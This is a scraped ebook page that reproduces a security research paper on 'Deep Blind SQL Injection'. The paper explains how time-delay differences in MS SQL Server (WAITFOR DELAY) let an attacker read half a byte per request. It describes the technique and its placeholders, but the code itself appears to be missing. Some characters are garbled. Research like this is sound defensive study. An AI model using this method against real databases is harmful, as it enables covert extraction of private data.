Free PDF Ebook | FileMount.com

In Deep Blind SQL Injection reading data is more complex than in classic blind … Deep Blind SQL Injection works well within MS SQL Server and may work in …

More PDF Content

Deep Blind SQL Injection
Page 1
Deep Blind SQL Injection Ferruh Mavituna www.portcullis-security.com Blind SQL Injection attacks are described in several papers 1 . If the injection point is completely blind 2 then the only way 3 to extract data is using time based attacks like WAITFOR DELAY, BENCHMARK etc. When it comes to reading data there are two known ways, 1. Reading data bit by bit 2. Reading data through a binary search algorithm with character patterns Both methods have a one request – one response limit and on average for each char you need to make six requests to the server. In Deep Blind SQL Injection reading data is more complex than in classic blind injection. However it is still possible to retrieve data, moreover it is possible with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char. Deep Blind SQL Injection works well within MS SQL Server and may work in other databases such as like ORACLE, PostgreSQL etc. This method of injection, which retrieves more that one response per request is achieved using time delay differences. For example if the first half byte of char is 6, the database is going to wait for 12 seconds, if second half byte of char is 1 it?s going to wait for 2 seconds. An attacker should store server response times and divide them by 2 to understand the response. Finally, in 2 requests we got 0×61 which is „a?. Obviously depending on the condition it?s possible to use larger or smaller dividers than 2.
Page 2
In Practice A working implementation for this attack for SQL Server: {QUERY} is the data that you want to get. This can be variable like USER or function like db_name(2) or it can be a SELECT statement which returns one row and one column. {POSITION} is the half-byteyou want to read.You need to add 2 to eliminate the “0x” string at the beginning from SQL Server responses. {SECONDS} is the multiplier for wait time. Waiting time can be tweaked as milliseconds but also by using fractions like WAITFOR DELAY ‘0:0:0.51′. Same code can be written in slightly different and shorter but less readable: Reality of Attacks Deep Blind SQL Injection in general terms is not suited to manual attacks, it is advisable that they be automated, this has been done within “BSQL Hacker” for SQL Server 4 . Limitations ? Unstable in environments where the connection time is slow or other factors which lead to unpredictable server response times. ?